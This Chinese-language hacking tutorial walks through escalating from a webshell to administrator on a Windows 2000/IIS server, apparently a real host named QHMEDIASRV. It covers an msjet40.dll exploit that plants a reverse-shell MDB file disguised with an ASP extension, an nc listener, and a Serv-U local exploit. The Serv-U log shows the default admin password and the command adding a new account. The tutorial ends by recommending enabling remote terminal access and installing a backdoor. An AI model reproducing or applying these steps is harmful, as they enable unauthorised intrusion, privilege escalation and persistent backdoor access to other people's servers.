jet exploit配合WEBSHELL提升权限

http://www.3800hk.com/news/w31/17410.html

目标站点是WINDOWS SERVER 2000系统，IIS 5.0 Wscript.shell  shell.application  Wscript.network组件全部删除的情况下测试的，要是什么都没删，什么安全也没做，那这次测试也没有什么意义了.

    现在管理员安全意识提高了，搞站越来越难了，往往拿到一个WEBSHELL，就不知道干些什么，除了FSO其他组件都不可以调用，就像这样的。如图1

看到了吧，入侵中对我们最有帮助的那3个组件全部删了，就一个FSO可以用，除非那个管理员是白痴，只删了组件，而没有把磁盘权限配好，很少有这样的管理员，碰到这种情况，一般就是传个Serv-u php exploit上去试下看看SERV-U密码改没，不过也不是每台机器都支持PHP的，所以这招也不是很管用，前段时间我弄了个MYSQL WEBSHELL提升都看过吧？必须要得到ROOT密码才行.最近不是出了个jet数据库溢出吗？可反弹得到一个cmdshell哦.不过是普通权限的。但是对于一些只会照着网上资料抄的管理员就N有用啦，虽然他把组件全部都删了但是，C盘的权限弄不明白，SERV-U的密码也是默认的，那就有我们的可趁之机了。好，我们先拿到个CMDSHELL再说吧，至少还能有一点机会.这里先概述一下这这个Microsoft Jet (msjet40.dll) Reverse Shell Exploit：

受影响系统：

Microsoft JET DB

不受影响系统：

Microsoft JET DB OLE Provider

详细描述：

Microsoft Jet数据库是MS Office应用程序中广泛使用的轻型数据库。msjet40.dll是Microsoft Jet数据库引擎的主要组件，可以评估并执行数据请求。

msjet40.dll解析数据库文件时没有执行充分的数据验证，这样攻击者就可以修改数据库文件，导致在打开MS Jet数据库时执行攻击者的代码。
 此信息由HexView提供(EML:vuln@hexview.com)
    存在漏洞的系统:
    * Microsoft JET 4.00.8618.0 版
    免疫系统:
    * Microsoft JetDB OLE Provider

先用jet.exe生成一个反弹连接的mdb文件如图2

好了生成好咯，然后我们就通过WEBSHELL传上去，有时候传上去，但是却没有找到文件，被杀了，把改为ASP后缀. 数据库操作功能比较强的ASP木马就属站长助手了。就用它来连接我们的“恶意”MDB文件吧，好上传成功，如图3

OK现在我们就开始连接我们生成好的文件咯，为了防止被杀毒软件XX我改成ASP后缀了.连接之前我们先得监听好端口哦，哪个端口？就是前面设置的，如图4

现在开始连接我刚刚上传的那个文件.如图5

只要没出现什么灾难性的错误，就表示连接成功了，好，看看我们的NC有反映没有.如图6

成功得到一个CMDSHELL，不过权限是GUESTS组的.这个时候IIS进程已经死了，所有的ASP文件都不可执行了.所以你得提前把你的工具什么的传上去.我之前已经把serv-u溢出程序传上去咯，在c:/winnt/system32/inetsrv/data/目录下 这个目录默认是EVERYONE完全控制的我想大家都知道，我就不多说.因为都做了权限CMDSHELL下根本没法跳到WEB目录.好了，执行我们的SERV-U溢出程序，看看管理员把默认密码改没有，啊哈？溢出成功，如图7

C:/WINNT/system32/inetsrv/Data>ftp 43958 "net user chadmin 520520 /add"
ftp 43958 "net user chadmin 520520 /add"
Serv-u >溢出工具黑猫专版

<220 Serv-U FTP Server v4.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Domain xl:0 Deleted
<505 Domain not found
******************************************************
[+] Creating New Domain...
<200-DomainID=2
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<220 Domain settings saved
200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user chadmin 520520 /add
<220 Domain deleted
******************************************************
[+] Domain xl:2 Deleted

C:/WINNT/system32/inetsrv/Data>

C:/WINNT/system32/inetsrv/Data>net user
net user

//QHMEDIASRV 的用户帐户

----------------------------------------------------------------
ASPNET                   chadmin                  courses
IUSR_QHMEDIASRV          IWAM_QHMEDIASRV          partner
  SQLDebugger              TsInternetUser

命令成功完成。

C:/WINNT/system32/inetsrv/Data>

没办法，还是被搞下了，终究归于管理员安全意识还不够高.权限配得不够好.后面该怎么样搞我就不用多说了，终端没开就给他开个.装后门，补漏洞。